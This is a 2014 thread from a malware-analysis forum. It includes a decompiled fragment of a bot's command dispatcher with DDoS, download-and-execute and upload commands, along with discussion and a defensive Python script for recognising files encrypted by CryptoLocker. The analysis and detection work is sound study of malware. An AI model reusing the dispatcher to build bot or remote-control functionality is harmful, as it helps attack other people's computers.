A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #21912  by Artilllerie
 Fri Jan 10, 2014 11:51 am
For information here is the code of the C&C commands :
```csharp
// Decompiled C# command dispatcher, fragment as posted: string_2 holds the raw
// C&C command, arguments are '|'-delimited, and the try block is cut off here.
string result;
	try
	{
		string_2 = string_2.Trim();
		if (string_2.ToLower().Trim().Contains("[end]"))
		{
			result = "finalized";
			return result;
		}
		if (string_2.StartsWith("writeregistry"))
		{
			string[] string_3 = string_2.Split(new char[]
			{
				'|'
			});
			result = Conversions.ToString(this.method_14(string_3));
			return result;
		}
		if (string_2.StartsWith("ddose"))
		{
			string[] string_4 = string_2.Split(new char[]
			{
				'|'
			});
			result = this.method_13(string_4);
			return result;
		}
		if (string_2.StartsWith("download"))
		{
			string[] string_5 = string_2.Split(new char[]
			{
				'|'
			});
			result = this.method_12(string_5, false);
			return result;
		}
		if (string_2.StartsWith("execute"))
		{
			string[] string_6 = string_2.Split(new char[]
			{
				'|'
			});
			result = this.method_11(string_6);
			return result;
		}
		// Never reached as written: "downloadandexecute" also starts with
		// "download", so the "download" branch above already returned.
		if (string_2.StartsWith("downloadandexecute"))
		{
			string[] string_7 = string_2.Split(new char[]
			{
				'|'
			});
			result = this.method_12(string_7, true);
			return result;
		}
		if (string_2.StartsWith("disallowshutdown"))
		{
			string[] string_8 = string_2.Split(new char[]
			{
				'|'
			});
			result = this.method_10(string_8);
			return result;
		}
		if (string_2.StartsWith("searchupload"))
		{
			string[] string_9 = string_2.Split(new char[]
			{
				'|'
			});
			result = this.method_9(string_9);
			return result;
		}
		if (string_2.StartsWith("showmessage"))
		{
			string[] string_10 = string_2.Split(new char[]
			{
				'|'
			});
			result = this.method_8(string_10);
			return result;
		}
		if (string_2.StartsWith("enablesockets"))
		{
			string[] string_11 = string_2.Split(new char[]
			{
				'|'
			});
			result = Conversions.ToString(this.method_7(string_11));
			return result;
		}
```
Note the "ddose" command related to what Cody Johnston said above ;).
 #21917  by thisisu
 Fri Jan 10, 2014 10:05 pm
Hi all,

Can someone please take a look at this file and let me know what type of malware it came from?

Message from the user on Jan 18th, 2013:
I have been attacked by a virus where all my excel, word, music files have been encrypted. My restore also states that it has been unable to complete. When I first turned my computer on I received a message saying all my files were encrypted and sent to the police and that I would have to send £100 to get them unencrypted. I am not very computer literate so if there is a fix I would need to have clear simple detailed steps. I hope you can help as I desperately need a couple of my Excel files.
 #21918  by Fabian Wosar
 Fri Jan 10, 2014 11:55 pm
thisisu wrote:Can someone please take a look at this file and let me know what type of malware it came from?
CryptoLocker. You can easily determine it yourself:

CryptoLocker files have a 276 byte header. The header essentially contains a SHA-1 hash (20 bytes) as well as a 256 byte key blob storing the encrypted AES key. The hash is calculated over four zero bytes and the key blob. So essentially you can check if the first 20 bytes are equal sha1(0x00000000<key blob>).

I wrote a small tool to scan for CryptoLocker files or determine if a specific file is encrypted by CryptoLocker based on the above check. I use it mostly to quickly determine if files that victims sent me are encrypted by CryptoLocker or not, as most users just send encrypted files and ask for help. If there is any interest in it, I can share it with you guys.
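The header check described above, as an added Python example (not Fabian's tool): it compares the first 20 bytes of a file with sha1(0x00000000 || key blob) and walks a directory for files that pass. The sample files are constructed here, not taken from a real infection.

```python
import hashlib
import os

HASH_LEN = 20                      # SHA-1 digest at the start of the file
BLOB_LEN = 256                     # key blob holding the encrypted AES key
HEADER_LEN = HASH_LEN + BLOB_LEN   # 276 bytes in total


def has_cryptolocker_header(data: bytes) -> bool:
    """True if data starts with sha1(4 zero bytes + key blob) followed by that blob."""
    if len(data) < HEADER_LEN:
        return False
    stored_hash = data[:HASH_LEN]
    key_blob = data[HASH_LEN:HEADER_LEN]
    expected = hashlib.sha1(b"\x00\x00\x00\x00" + key_blob).digest()
    return stored_hash == expected


def scan_directory(root: str) -> list:
    """Return paths under root whose first 276 bytes pass the header check."""
    hits = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    head = fh.read(HEADER_LEN)
            except OSError:
                continue               # unreadable file: skip, do not abort the scan
            if has_cryptolocker_header(head):
                hits.append(path)
    return hits


def build_sample(key_blob: bytes, body: bytes) -> bytes:
    """Constructed test vector: a well-formed header in front of arbitrary body bytes."""
    return hashlib.sha1(b"\x00" * 4 + key_blob).digest() + key_blob + body


# Constructed inputs (assumptions, not real samples): a 256-byte stand-in for the
# key blob, and an ordinary file whose start resembles a zip/xlsx container.
SAMPLE_BLOB = bytes(range(256))
ENCRYPTED_SAMPLE = build_sample(SAMPLE_BLOB, b"ciphertext bytes would follow")
PLAIN_SAMPLE = b"PK\x03\x04" + b"\x00" * 300

if __name__ == "__main__":
    print(has_cryptolocker_header(ENCRYPTED_SAMPLE))  # True
    print(has_cryptolocker_header(PLAIN_SAMPLE))      # False
```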
 #21919  by thisisu
 Sat Jan 11, 2014 1:45 am
Fabian Wosar wrote:I wrote a small tool to scan for CryptoLocker files or determine if a specific file is encrypted by CryptoLocker based on the above check. I use it mostly to quickly determine if files that victims sent me are encrypted by CryptoLocker or not, as most users just send encrypted files and ask for help. If there is any interest in it, I can share it with you guys.
I'm interested. Thank you for reviewing the file. :)
 #21928  by Fabian Wosar
 Mon Jan 13, 2014 11:01 am
AliveNoMore wrote:I still can't run CryptoLocker. I've created a special VM for malware without additions, renamed devices and registry keys. What am I doing wrong? How are guys testing it?
CryptoLocker is not VM aware. Most likely your infection has a hard time finding a valid C2 server as the vast majority of domains generated by the DGA are sinkholed. Just run a sniffer on the host and check if excessive DNS traffic is taking place. If it is, the malware desperately tries to find a C2 server.
 #21939  by AliveNoMore
 Tue Jan 14, 2014 4:20 am
Fabian Wosar wrote:
AliveNoMore wrote:I still can't run CryptoLocker. I've created a special VM for malware without additions, renamed devices and registry keys. What am I doing wrong? How are guys testing it?
CryptoLocker is not VM aware. Most likely your infection has a hard time finding a valid C2 server as the vast majority of domains generated by the DGA are sinkholed. Just run a sniffer on the host and check if excessive DNS traffic is taking place. If it is, the malware desperately tries to find a C2 server.
Hm, thought it would actually be VM aware. Anyway, I suppose the only thing I can do to test it is to just let it run and hope it would manage to find a C2 server that isn't sinkholed, which could take quite a while?
 #22011  by Grinler
 Tue Jan 21, 2014 1:38 am
tjcoder wrote:Just thought I'd add this for completeness: http://www.zdnet.com/cryptolockers-crim ... 000024579/

They are using only 3 bitcoin addresses since the first infection. Literally every bitcoin transaction is publicly logged by multiple parties; this includes ones to exchanges and every single one leaving these 3 addresses, yet they've cashed out literally tens of millions of USD and nobody knows who they are or even where on earth they are located. Someone is extremely lazy or hiding something, and it's not the authors of this malware.
When Crilock infects a computer it generates a new bitcoin address. Only in the beginning were they using static addresses.